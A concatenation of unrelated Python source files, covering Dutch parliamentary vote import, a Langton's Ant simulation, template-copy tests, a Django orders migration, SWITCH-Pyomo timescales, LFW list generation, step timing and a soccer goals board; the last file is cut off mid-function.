if 'aangenomen' in result_string or 'overeenkomstig' in result_string:
return Voting.AANGENOMEN
elif 'verworpen' in result_string:
return Voting.VERWORPEN
elif 'ingetrokken' in result_string:
return Voting.INGETROKKEN
elif 'aangehouden' in result_string or 'uitgesteld' in result_string:
return Voting.AANGEHOUDEN
elif 'controversieel verklaard' in result_string:
return Voting.CONTROVERSIEEL
logger.error('could not interpret the voting result: ' + result_string)
return Voting.ONBEKEND
class VoteFactory(object):
def __init__(self, do_create_missing_party=True):
self.do_create_missing_party = do_create_missing_party
@transaction.atomic
def create_votes_party(self, voting, stemmingen):
logger.info('BEGIN')
for stemming in stemmingen:
fractie_name = stemming.actor_fractie if stemming.actor_fractie else stemming.actor_naam
party = PoliticalParty.find_party(fractie_name)
if not party and self.do_create_missing_party:
party = self.create_missing_party(stemming)
if not stemming.soort:
                logger.warning('stemming has no soort (vote decision); it will default to Vote.NONE: ' + str(stemming.soort))
VoteParty.objects.create(
voting=voting,
party=party,
party_name=fractie_name,
number_of_seats=stemming.fractie_size,
decision=self.get_decision(stemming.soort),
details='',
is_mistake=stemming.vergissing if stemming.vergissing is not None else False
)
logger.info('END')
@staticmethod
def create_missing_party(stemming):
party_name = stemming.actor_naam # TODO: use fractie.naam (currently not available in TK API)
wikidata_id = wikidata.search_political_party_id(party_name, language='nl')
party = PoliticalParty.objects.create(
name=party_name,
# name_short=stemming.fractie.afkorting, # TODO: use fractie.afkorting (currently not available in TK API)
wikidata_id=wikidata_id
)
party.update_info(language='nl')
return party
@transaction.atomic
def create_votes_individual(self, voting, stemmingen):
logger.info('BEGIN')
for stemming in stemmingen:
persoon = stemming.persoon
parliament_member = None
persons = Person.objects.filter(tk_id=persoon.id)
if persons:
person = persons[0]
members = ParliamentMember.objects.filter(person=person).order_by('-joined')
parliament_member = members[0] if members.exists() else None
person_name = ' '.join([person.forename, person.surname, person.initials]).strip()
# TODO BR: this is a fallback, remove or extract function and log
if parliament_member is None:
if persoon:
initials = persoon.initialen
surname = persoon.achternaam
forname = persoon.roepnaam
else:
logger.error('Persoon not found for stemming: {}'.format(stemming.id))
surname_initials = stemming.json['AnnotatieActorNaam']
forname = ''
initials, surname, surname_prefix = parse_name_surname_initials(surname_initials)
parliament_member = ParliamentMember.find(surname=surname, initials=initials)
if not parliament_member:
logger.error('parliament member not found for vote: {}'.format(stemming.id))
logger.error('creating vote with empty parliament member')
person_name = ' '.join([forname, surname, initials]).strip()
VoteIndividual.objects.create(
voting=voting,
person_name=person_name,
person_tk_id=persoon.id,
parliament_member=parliament_member,
number_of_seats=1,
decision=self.get_decision(stemming.soort),
details='',
is_mistake=stemming.vergissing if stemming.vergissing is not None else False
)
logger.info('END')
@staticmethod
def get_decision(decision_string):
if 'Voor' == decision_string:
return Vote.FOR
elif 'Tegen' == decision_string:
return Vote.AGAINST
elif 'Niet deelgenomen' == decision_string:
return Vote.NONE
logger.error('no decision detected, returning Vote.NONE')
return Vote.NONE
|
import pygame
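# Langton's Ant: on an empty cell the ant turns right, on a filled cell it turns left,
# and it toggles the cell it leaves. The update() rules below follow that convention,
# with the screen's y axis pointing down.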
class Ant:
def __init__(self):
self.nodes = {}
self.node_size = 10
self.width = 1001
self.height = 1001
self.backg_color = (145,73,48)
self.pixel_color = (207,148,110)
self.ant_color = (0,0,0)
        self.ant_start_x = 501 // self.node_size
        self.ant_start_y = 501 // self.node_size
self.ant_x = self.ant_start_x
self.ant_y = self.ant_start_y
self.ant_dir = "up"
self.paused = True
self.screen = pygame.display.set_mode((self.width, self.height), pygame.HWSURFACE | pygame.DOUBLEBUF)
self.screen.fill(self.backg_color)
pygame.display.set_caption("Ant")
def init(self):
pygame.init()
self.font = pygame.font.SysFont("monospace", 15)
self.running = True
while self.running:
for event in pygame.event.get():
self.event(event)
            if not self.paused:
                self.update()
self.render()
self.cleanup()
def update(self):
killNode = None
createNode = None
if (self.ant_x, self.ant_y) in self.nodes:
if self.ant_dir == "up":
self.ant_dir = "left"
killNode = (self.ant_x, self.ant_y)
self.ant_x -= 1
elif self.ant_dir == "down":
self.ant_dir = "right"
killNode = (self.ant_x, self.ant_y)
self.ant_x += 1
elif self.ant_dir == "left":
self.ant_dir = "down"
killNode = (self.ant_x, self.ant_y)
self.ant_y += 1
elif self.ant_dir == "right":
self.ant_dir = "up"
killNode = (self.ant_x, self.ant_y)
self.ant_y -= 1
else:
if self.ant_dir == "up":
self.ant_dir = "right"
createNode = (self.ant_x, self.ant_y)
self.ant_x += 1
elif self.ant_dir == "down":
self.ant_dir = "left"
createNode = (self.ant_x, self.ant_y)
self.ant_x -= 1
elif self.ant_dir == "left":
self.ant_dir = "up"
createNode = (self.ant_x, self.ant_y)
self.ant_y -= 1
elif self.ant_dir == "right":
self.ant_dir = "down"
createNode = (self.ant_x, self.ant_y)
self.ant_y += 1
        if killNode in self.nodes:
            del self.nodes[killNode]
            # restore the background colour on the cell the ant just cleared
            pygame.draw.rect(self.screen, self.backg_color, (killNode[0]*self.node_size, killNode[1]*self.node_size, self.node_size, self.node_size))
if createNode is not None:
if createNode[0] > 0 and createNode[0] < self.width/self.node_size:
if createNode[1] > 0 and createNode[1] < self.height/self.node_size:
self.nodes[createNode] = 1
pygame.draw.rect(self.screen, self.pixel_color, (createNode[0]*self.node_size, createNode[1]*self.node_size, self.node_size, self.node_size))
def event(self, event):
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYUP:
if event.key == pygame.K_p:
self.paused = not self.paused
def render(self):
# draw ant at current position
pygame.draw.rect(self.screen, self.ant_color, (self.ant_x*self.node_size, self.ant_y*self.node_size, self.node_size, self.node_size))
pygame.display.flip()
def cleanup(self):
pygame.quit()
if __name__ == "__main__":
ant = Ant()
ant.init()
|
import unittest
from unittest.mock import patch
import fs.path
from moban.core.mobanfile.templates import handle_template
class TestHandleTemplateFunction(unittest.TestCase):
def setUp(self):
self.base_dir = [fs.path.join("tests", "fixtures")]
def test_copy_files(self):
results = list(
handle_template("copier-test01.csv", "/tmp/test", self.base_dir)
)
expected = [("copier-test01.csv", "/tmp/test", "csv")]
assert expected == results
@patch("moban.externals.reporter.report_error_message")
def test_file_not_found(self, reporter):
list(
handle_template(
"copier-test-not-found.csv", "/tmp/test", self.base_dir
)
)
reporter.assert_called_with(
"copier-test-not-found.csv cannot be found"
)
def test_listing_dir(self):
test_dir = "/tmp/copy-a-directory"
results = list(
handle_template("copier-directory", test_dir, self.base_dir)
)
expected = [
(
"copier-directory/level1-file1",
fs.path.join("/tmp/copy-a-directory", "level1-file1"),
None,
)
]
assert expected == results
    def test_listing_dir_recursively(self):
test_dir = "/tmp/copy-a-directory"
results = list(
handle_template("copier-directory/**", test_dir, self.base_dir)
)
expected = [
(
fs.path.join("copier-directory", "copier-sample-dir", "file1"),
fs.path.join(
"/tmp/copy-a-directory", "copier-sample-dir", "file1"
),
None,
),
(
fs.path.join("copier-directory", "level1-file1"),
fs.path.join("/tmp/copy-a-directory", "level1-file1"),
None,
),
]
assert sorted(results, key=lambda x: x[0]) == sorted(
expected, key=lambda x: x[0]
)
@patch("moban.externals.reporter.report_error_message")
    def test_listing_dir_recursively_with_error(self, reporter):
test_dir = "/tmp/copy-a-directory"
list(
handle_template(
"copier-directory-does-not-exist/**", test_dir, self.base_dir
)
)
assert reporter.call_count == 1
|
#!/usr/bin/env python3
from .baseController import *
"""
#################
# The Functions #
######################################
## Global file with all the functions.
######################################
"""
class BUFFALO(BaseController):
def defineController(self):
self.name = 'Buffalo controller'
|
# Generated by Django 3.0.5 on 2020-06-01 22:25
from decimal import Decimal
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_order_id', models.CharField(blank=True, max_length=120, verbose_name='Order ID')),
('subtotal_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Subtotal Amount')),
('total_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Total Amount')),
('status', models.CharField(blank=True, choices=[('created', 'Created'), ('processing', 'Processing'), ('booked', 'Booked'), ('shipped', 'Shipped'), ('in_transit', 'In Transit'), ('delivered', 'Delivered'), ('refunded', 'Refunded'), ('cancelled', 'Cancelled'), ('declined', 'Declined'), ('unpaid', 'Unpaid'), ('paid', 'Paid')], max_length=50, verbose_name='Status')),
('active', models.BooleanField(blank=True, default=True, verbose_name='Active')),
('discount_code', models.CharField(blank=True, max_length=120, verbose_name='Discount Code')),
('commission_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=120, verbose_name='Commission Amount')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP Address')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order')),
],
options={
'verbose_name': 'Order',
'verbose_name_plural': 'Orders',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='OrderShippingInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(blank=True, verbose_name='Description')),
('payment_method', models.CharField(blank=True, choices=[('cash', 'Cash'), ('credit_card', 'Credit Card'), ('bank_transfer', 'Bank Transfer')], default='cash', max_length=120, verbose_name='Payment Method')),
('shipping_company', models.CharField(blank=True, max_length=120, verbose_name='Shipping Company')),
('shipping_total', models.DecimalField(blank=True, decimal_places=2, default=Decimal('10'), max_digits=100, verbose_name='Shipping Total')),
('tracking_number', models.CharField(blank=True, max_length=120, verbose_name='Tracking Number')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order Shipping Information')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order Shipping Information')),
],
options={
'verbose_name': 'Order Shipping Information',
'verbose_name_plural': 'Order Shipping Information',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='OrderShippingMovement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('subtitle', models.CharField(max_length=100, verbose_name='Subtitle (for status info)')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order Shipping Movement')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order Shipping Movement')),
],
options={
'verbose_name': 'Order Shipping Movement',
'verbose_name_plural': 'Order Shipping Movements',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='ProductPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_item_id', models.CharField(blank=True, max_length=120, verbose_name='Unique Item ID')),
('product_price', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=25, verbose_name='Product Price')),
('qty', models.IntegerField(default=1, verbose_name='Quantity')),
('line_total', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Line Total')),
('refunded', models.BooleanField(default=False, verbose_name='Refunded')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Product Purchase')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Product Purchase')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Order', verbose_name='Order')),
],
options={
'verbose_name': 'Product Purchase',
'verbose_name_plural': 'Product Purchases',
'ordering': ['-updated_at'],
},
),
]
|
# Copyright 2015 The Switch Authors. All rights reserved.
# Licensed under the Apache License, Version 2, which is in the LICENSE file.
"""
Defines timescales for investment and dispatch for the SWITCH-Pyomo model.
SYNOPSIS
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.load_inputs(inputs_dir='test_dat')
"""
import os
from pyomo.environ import *
hours_per_year = 8766
def define_components(mod):
"""
Augments a Pyomo abstract model object with sets and parameters that
describe timescales of investment and dispatch decisions.
PERIODS is the set of multi-year periods describing the timescale of
investment decisions. The following parameters describe attributes
of a period.
period_start[p]: The starting year of an investment period.
period_end[p]: The last year of an investment period.
period_length_years[p]: The number of years in an investment
period; derived from period_start and period_end.
period_length_hours[p]: The number of hours in an investment
period; derived from period_length_years with an average of 8766
hours per year.
TIMESERIES denote blocks of consecutive timepoints within a period.
An individual time series could represent a single day, a week, a
month or an entire year. This replaces the DATE construct in the old
SWITCH code and is meant to be more versatile. The following parameters
describe attributes of a timeseries.
ts_period[ts]: The period a timeseries falls in.
ts_num_tps[ts]: The number of timepoints in a timeseries.
ts_duration_of_tp[ts]: The duration in hours of each timepoint
within a timeseries. This is used for calculations that ensure a
storage project has a sufficient energy charge when it is
dedicated to providing reserves.
ts_duration_hrs[ts]: The total duration of a timeseries in hours.
= ts_duration_of_tp[ts] * ts_num_tps[ts]
ts_scale_to_period[ts]: The number of times this representative
timeseries is expected to occur in a period. Used as a scaling
factor to adjust the weight from ts_duration_hrs up to a period.
See examples below.
ts_scale_to_year[ts]: The number of times this representative
timeseries is expected to occur in a year.
TIMEPOINTS describe unique timepoints within a time series and
typically index exogenous variables such as electricity demand and
variable renewable energy output. The duration of a timepoint is
typically on the order of one or more hours, so costs associated
with timepoints are specified in hourly units, and the weights of
timepoints are specified in units of hours. TIMEPOINTS replaces the
HOURS construct in some of the old versions of SWITCH. The order of
timepoints is provided by their ordering in their input file
according to the standard Pyomo/AMPL conventions. To maintain
sanity, we recommend sorting your input file by timestamp. Each
timepoint within a series has the same duration to simplify
statistical calculations. The following parameters describe
attributes of timepoints.
tp_weight[t]: The weight of a timepoint within an investment
period in units of hours per period.
= ts_duration_of_tp[ts] * ts_scale_to_period[ts]
tp_weight_in_year[t]: The weight of a timepoint within a year
in units of hours per year.
= tp_weight[t] / period_length_years[p]
tp_timestamp[t]: The timestamp of the future time represented by
this timepoint. This is only used as a label and can follow any
format you wish. Although we highly advise populating this
parameter, it is optional and will default to t.
tp_ts[t]: This timepoint's timeseries.
tp_period[t]: This timepoint's period.
tp_duration_hrs[t]: The duration of this timepoint in hours,
taken directly from the timeseries specification ts_duration_of_tp.
tp_previous[t]: The timepoint that is previous to t in its
timeseries. Timeseries are treated circularly, so previous of the
first timepoint will be the last timepoint in the series instead of
being None or invalid. In the degenerate case of a timeseries with a
single timepoint, tp_previous[t] will be t.
PERIOD_TPS[period]: The set of timepoints in a period.
TS_TPS[timeseries]: The ordered set of timepoints in a timeseries.
Data validity check:
Currently, the sum of tp_weight for all timepoints in a period
must be within 1 percent of the expected length of the investment
    period. Period length is calculated by multiplying the
average number of hours in a year rounded to the nearest integer
(8766) by the number of years per period. I implemented this rule
because these are used as weights for variable costs of dispatch and
operations, and I think it is important for those costs to reflect
those expected costs over an entire period or else the levelized
costs of power that is being optimized will not make sense.
EXAMPLES
These hypothetical examples illustrate differential weighting of
timepoints and timeseries. Each timepoint adds additional
computational complexity, and you may wish to reduce the time
resolution in low-stress periods and increase the time resolution in
high-stress periods. These examples are probably not the resolutions
you would choose, but are meant to illustrate calculations. When
calculating these for your own models, you may check your
calculations by adding all of the tp_weights in a period and
ensuring that it is equal to the length of the period in years times
8766, the average number of hours per year. That weighting ensures
an accurate depiction of variable costs and dispatch relative to
fixed costs such as capital. This check is also performed when
loading a model and will generate an error if the sum of weights of
all timepoints in a period are more than 1 percent different than
the expected number of hours.
Example 1: The month of January is described by two timeseries: one
to represent a median load day (example 1) and one to represent a
peak day (example 2). In these examples, the timeseries for the
median load day has a much larger weight than the timeseries for the
peak load day.
January median timeseries: A timeseries describing a median day in
January is composed of 6 timepoints, each representing a 4-hour
block. This is scaled up by factor of 30 to represent all but 1 day
in January, then scaled up by a factor of 10 to represent all
Januaries in a 10-year period.
* ts_num_tps = 6 tp/ts
* ts_duration_of_tp = 4 hr/tp
* ts_duration_hrs = 24 hr/ts
= 6 tp/ts * 4 hr/tp
* ts_scale_to_period = 300 ts/period
= 1 ts/24 hr * 24 hr/day * 30 day/yr * 10 yr/period
24 hr/day is a conversion factor. 30 day/yr indicates this
timeseries is meant to represent 30 days out of every year. If
it represented every day in January instead of all but one day,
        this term would be 31 day/yr.
* tp_weight[t] = 1200 hr/period
= 4 hr/tp * 1 tp/ts * 300 ts/period
January peak timeseries: This timeseries describing a peak day in
January is also composed of 6 timepoints, each representing a 4-hour
block. This is scaled up by factor of 1 to represent a single peak
day of the month January, then scaled up by a factor of 10 to
represent all peak January days in a 10-year period.
* ts_num_tps = 6 tp/ts
* ts_duration_of_tp = 4 hr/tp
* ts_duration_hrs = 24 hr/ts
= 6 tp/ts * 4 hr/tp
* ts_scale_to_period = 10 ts/period
= 1 ts/24 hr * 24 hr/day * 1 day/yr * 10 yr/period
24 hr/day is a conversion factor. 1 day/yr indicates this
timeseries is meant to represent a single day out of the year.
* tp_weight[t] = 40 hr/period
= 4 hr/tp * 1 tp/ts * 10 ts/period
Example 2: The month of July is described by one timeseries that
represents an entire week because July is a high-stress period for
the grid and needs more time resolution to capture capacity and
storage requirements.
This timeseries describing 7 days in July is composed of 84
timepoints, each representing 2 hour blocks. These are scaled up to
represent all 31 days of July, then scaled by another factor of 10
to represent a 10-year period.
* ts_num_tps = 84 tp/ts
* ts_duration_of_tp = 2 hr/tp
* ts_duration_hrs = 168 hr/ts
= 84 tp/ts * 2 hr/tp
* ts_scale_to_period = 44.29 ts/period
= 1 ts/168 hr * 24 hr/day * 31 days/yr * 10 yr/period
24 hr/day is a conversion factor. 31 day/yr indicates this
timeseries is meant to represent 31 days out of every year (31
days = duration of July).
* tp_weight[t] = 88.58 hr/period
= 2 hr/tp * 1 tp/ts * 44.29 ts/period
Example 3: The windy season of March & April are described with a
single timeseries spanning 3 days because this is a low-stress
period on the grid with surplus wind power and frequent
curtailments.
    This timeseries describing 3 days in Spring is composed of 72
timepoints, each representing 1 hour. The timeseries is scaled up by
a factor of 21.3 to represent the 61 days of March and April, then
scaled by another factor of 10 to represent a 10-year period.
* ts_num_tps = 72 tp/ts
* ts_duration_of_tp = 1 hr/tp
* ts_duration_hrs = 72 hr/ts
= 72 tp/ts * 1 hr/tp
* ts_scale_to_period = 203.3 ts/period
= 1 ts/72 hr * 24 hr/day * 61 days/yr * 10 yr/period
        24 hr/day is a conversion factor. 61 day/yr indicates this
timeseries is meant to represent 61 days out of every year (31
days in March + 30 days in April).
* tp_weight[t] = 203.3 hr/period
= 1 hr/tp * 1 tp/ts * 203.3 ts/period
EXAMPLE
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.create('test_dat/timescales.dat')
>>> instance = model.create('test_dat/timescales_bad_weights.dat')
Traceback (most recent call last):
...
ValueError: BuildCheck 'validate_time_weights' identified error with index '2020'
"""
mod.PERIODS = Set(ordered=True)
mod.period_start = Param(mod.PERIODS, within=PositiveReals)
mod.period_end = Param(mod.PERIODS, within=PositiveReals)
mod.min_data_check('PERIODS', 'period_start', 'period_end')
mod.period_length_years = Param(
mod.PERIODS,
initialize=lambda m, p: m.period_end[p] - m.period_start[p] + 1)
mod.period_length_hours = Param(
mod.PERIODS,
initialize=lambda m, p: m.period_length_years[p] * hours_per_year)
mod.TIMESERIES = Set(ordered=True)
mod.ts_period = Param(mod.TIMESERIES, within=mod.PERIODS)
mod.ts_duration_of_tp = Param(mod.TIMESERIES, within=PositiveReals)
mod.ts_num_tps = Param(mod.TIMESERIES, within=PositiveIntegers)
mod.ts_scale_to_period = Param(mod.TIMESERIES, within=PositiveReals)
mod.min_data_check(
'TIMESERIES', 'ts_period', 'ts_duration_of_tp', 'ts_num_tps',
'ts_scale_to_period')
mod.ts_scale_to_year = Param(
mod.TIMESERIES,
initialize=lambda m, ts: (
m.ts_scale_to_period[ts] / m.period_length_years[m.ts_period[ts]]))
mod.ts_duration_hrs = Param(
mod.TIMESERIES,
initialize=lambda m, ts: (
m.ts_num_tps[ts] * m.ts_duration_of_tp[ts]))
mod.TIMEPOINTS = Set(ordered=True)
mod.tp_ts = Param(mod.TIMEPOINTS, within=mod.TIMESERIES)
mod.min_data_check('TIMEPOINTS', 'tp_ts')
mod.tp_timestamp = Param(mod.TIMEPOINTS, default=lambda m, t: t)
mod.tp_period = Param(
mod.TIMEPOINTS,
within=mod.PERIODS,
initialize=lambda m, t: m.ts_period[m.tp_ts[t]])
mod.tp_weight = Param(
mod.TIMEPOINTS,
within=PositiveReals,
initialize=lambda m, t: (
m.ts_duration_of_tp[m.tp_ts[t]] *
m.ts_scale_to_period[m.tp_ts[t]]))
mod.tp_weight_in_year = Param(
mod.TIMEPOINTS,
within=PositiveReals,
initialize=lambda m, t: (
m.tp_weight[t] / m.period_length_years[m.tp_period[t]]))
mod.tp_duration_hrs = Param(
mod.TIMEPOINTS,
initialize=lambda m, t: m.ts_duration_of_tp[m.tp_ts[t]])
############################################################
# Helper sets indexed for convenient look-up.
# I didn't use filter because it isn't implemented for indexed sets.
mod.TS_TPS = Set(
mod.TIMESERIES,
ordered=True,
within=mod.TIMEPOINTS,
initialize=lambda m, ts: [
t for t in m.TIMEPOINTS if m.tp_ts[t] == ts])
mod.PERIOD_TPS = Set(
mod.PERIODS,
ordered=True,
within=mod.TIMEPOINTS,
initialize=lambda m, p: [
t for t in m.TIMEPOINTS if m.tp_period[t] == p])
# This next parameter is responsible for making timeseries either
    # linear or circular. It is necessary for tracking unit commitment
# as well as energy in storage. The prevw(x) method of an ordered
# set returns the set element that comes before x in the set,
# wrapping back to the last element of the set if x is the first
# element.
mod.tp_previous = Param(
mod.TIMEPOINTS,
within=mod.TIMEPOINTS,
initialize=lambda m, t: m.TS_TPS[m.tp_ts[t]].prevw(t))
def validate_time_weights_rule(m, p):
hours_in_period = sum(m.tp_weight[t] for t in m.PERIOD_TPS[p])
tol = 0.01
if(hours_in_period > (1 + tol) * m.period_length_hours[p] or
hours_in_period < (1 - tol) * m.period_length_hours[p]):
print ("validate_time_weights_rule failed for period " +
"'{period:.0f}'. Expected {period_h:0.2f}, based on " +
"length in years, but the sum of timepoint weights " +
"is {ds_h:0.2f}.\n"
).format(period=p, period_h=m.period_length_hours[p],
ds_h=hours_in_period)
return 0
return 1
mod.validate_time_weights = BuildCheck(
mod.PERIODS,
rule=validate_time_weights_rule)
def load_inputs(mod, switch_data, inputs_dir):
"""
Import data for timescales from .tab files. The inputs_dir
should contain the following files with these columns. The
columns may be in any order and extra columns will be ignored.
periods.tab
INVESTMENT_PERIOD, period_start, period_end
timeseries.tab
TIMESERIES, period, ts_duration_of_tp, ts_num_tps,
ts_scale_to_period
The order of rows in timepoints.tab indicates the order of the
timepoints per Pyomo and AMPL convention. To maintain your sanity,
we highly recommend that you sort your input file chronologically by
    timestamp. Note: timestamp is solely used as a label and can be in any
format.
timepoints.tab
timepoint_id, timestamp, timeseries
EXAMPLE:
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.load_inputs(inputs_dir='test_dat')
>>> instance.tp_weight_in_year.pprint()
tp_weight_in_year : Size=7, Index=TIMEPOINTS, Domain=PositiveReals, Default=None, Mutable=False
Key : Value
1 : 1095.744
2 : 1095.744
3 : 1095.744
4 : 1095.744
5 : 2191.5
6 : 2191.5
7 : 8766.0
"""
    # Include select in each load() function so that it will check the column
# names, be indifferent to column order, and throw an error message if
# some columns are not found.
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'periods.tab'),
select=('INVESTMENT_PERIOD', 'period_start', 'period_end'),
index=mod.PERIODS,
param=(mod.period_start, mod.period_end))
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'timeseries.tab'),
select=('TIMESERIES', 'ts_period', 'ts_duration_of_tp',
'ts_num_tps', 'ts_scale_to_period'),
index=mod.TIMESERIES,
param=(mod.ts_period, mod.ts_duration_of_tp,
mod.ts_num_tps, mod.ts_scale_to_period))
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'timepoints.tab'),
select=('timepoint_id', 'timestamp', 'timeseries'),
index=mod.TIMEPOINTS,
param=(mod.tp_timestamp, mod.tp_ts))
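# Small arithmetic cross-check of Example 1 from the docstring above (added purely for
# illustration; the numbers come straight from that example, nothing here is new data).
if __name__ == '__main__':
    ts_duration_of_tp = 4      # hr/tp
    ts_num_tps = 6             # tp/ts
    ts_scale_to_period = 300   # ts/period (median January day, 10-year period)
    ts_duration_hrs = ts_duration_of_tp * ts_num_tps       # 24 hr/ts
    tp_weight = ts_duration_of_tp * ts_scale_to_period     # 1200 hr/period
    assert (ts_duration_hrs, tp_weight) == (24, 1200)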
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Generate test lists"""
import scipy.io as io
import numpy as np
f1 = 'image_list_for_lfw.txt'
mat_lfw = io.loadmat('LightenedCNN_B_lfw.mat')
lfw_path_list = mat_lfw['image_path']
lfw_path_list = np.transpose(lfw_path_list)
lfw_label_list = mat_lfw['labels_original']
lfw_label_list = np.transpose(lfw_label_list)
for idx, ele in enumerate(lfw_path_list):
print(ele[0][0][10:], lfw_label_list[idx][0][0])
with open(f1, 'a') as f:
line = ele[0][0][10:] + ' ' + lfw_label_list[idx][0][0]
f.write(line + '\n')
f2 = 'image_list_for_blufr.txt'
mat_blufr = io.loadmat('BLUFR/config/lfw/blufr_lfw_config.mat')
blufr_path_list = mat_blufr['imageList']
for _, ele in enumerate(blufr_path_list):
print(ele[0][0])
with open(f2, 'a') as f:
f.write(ele[0][0] + '\n')
|
import time
import logging
logger = logging.getLogger(__name__)
class Steps:
    fstep = 0
    lstep = -1
    def __init__(self, fs=0, ls=1000):
        self.fstep = fs
        self.lstep = ls
        # per-instance lists; class-level lists would be shared between Steps instances
        self.times = []
        self.tags = []
def isstep(self, step, tag=""):
if self.lstep >= step >= self.fstep:
new_time = time.time()
self.times.append(new_time)
self.tags.append(tag)
logger.debug("Starting step %s (%s)" % (step,tag))
if len(self.times) > 1:
step_time = new_time - self.times[-2]
logger.debug("Previous step (%s) took %s seconds" % (self.tags[-2],step_time))
return True
else:
logger.debug("Skipping step %s (%s)" % (step,tag))
return False
def endsteps(self):
self.times.append(time.time())
def __get_total_time_string(self, init, end):
total_secs = end - init
total_hours = total_secs / 60.0 / 60.0
total_days = total_hours / 24.0
tts = "Total time=%s secs. - %s hours. - %s days" % (total_secs, total_hours, total_days)
return tts
def get_print_times(self):
time_string = "--- TIMES ----\n"
time_string = time_string + str(self.times) + "\n-----------\n"
for (i,t) in enumerate(self.times[1:]):
time_lapse = t - self.times[i]
ts = "%s) Step %s (%s) took=%s secs." % (i, (self.fstep+i), self.tags[i],time_lapse)
time_string = time_string + ts + "\n"
tts = self.__get_total_time_string(self.times[0],self.times[-1])
time_string = time_string + tts + "\n"
time_string = time_string + "-----------\n"
return time_string
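# Hedged usage sketch (not part of the original module): a script numbers its stages and
# wraps each one in isstep(), so a contiguous range of steps can be skipped on re-runs.
#
#   steps = Steps(fs=2, ls=5)          # only run steps 2..5
#   if steps.isstep(1, "download"):    # skipped: 1 < fs
#       pass
#   if steps.isstep(2, "preprocess"):  # runs, and its duration is logged
#       pass
#   steps.endsteps()
#   print(steps.get_print_times())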
|
# -*- coding: utf-8 -*-
"""
Created by zejiran.
"""
def cargar_tablero_goles(ruta_archivo: str) -> list:
"""
    This function loads the information of a goals board
    from a CSV file.
    The first row of the file contains the dimension of the (square) board.
    Parameters:
    ruta_archivo (str): the path of the file to load.
    Returns: list
    The matrix with the goals board.
"""
archivo = open(ruta_archivo)
dimensiones = archivo.readline().split(",")
filas = int(dimensiones[0])
columnas = filas
tablero = []
for i in range(0, filas):
tablero.append([0] * columnas)
linea = archivo.readline()
i = 0
while len(linea) > 0:
datos = linea.split(",")
for j in range(0, columnas):
tablero[i][j] = int(datos[j])
i += 1
linea = archivo.readline()
archivo.close()
return tablero
def cargar_equipos(ruta_archivo: str) -> dict:
"""
    This function loads the information of the teams
    from a CSV file.
    Parameters:
    ruta_archivo (str): the path of the file to load
    Returns: dict
    A dictionary in which the keys are the team names and
    the values are consecutive indices.
"""
archivo = open(ruta_archivo)
equipos = {}
linea = archivo.readline()
while len(linea) > 0:
datos = linea.split(",")
equipos[datos[0]] = int(datos[1])
linea = archivo.readline()
archivo.close()
return equipos
def anotar_marcador(tablero_goles: list, equipos: dict, equipo1: str, equipo2: str, marcador: str) -> list:
"""
    This function records the score of a match in the goals board.
    Parameters:
    tablero_goles (list): matrix containing the goals board.
    equipos (dict): dictionary of the teams in the championship.
    equipo1 (string): name of the first team of the match.
    equipo2 (string): name of the second team of the match.
    marcador (string): string with format goles1-goles2, where goles1 are the goals equipo1
    scored against equipo2 and goles2 are the goals equipo2 scored against equipo1.
    Returns: list
    The updated goals matrix.
"""
pos_equipo1 = int(equipos.get(equipo1))
pos_equipo2 = int(equipos.get(equipo2))
marcador = marcador.split("-")
tablero_goles[pos_equipo1][pos_equipo2] = int(marcador[0])
tablero_goles[pos_equipo2][pos_equipo1] = int(marcador[1])
return tablero_goles
def total_goles(tablero_goles: list) -> int:
"""
    This function computes the total number of goals scored in the championship.
    Parameters:
    tablero_goles (list): matrix containing the goals board.
    Returns: int
    The total number of goals in the matrix.
"""
goles_totales = 0
for fila in tablero_goles:
for columna in fila:
if columna != -1 and columna != -2:
goles_totales += int(columna)
return goles_totales
def partidos_jugados(tablero_goles: list) -> int:
"""
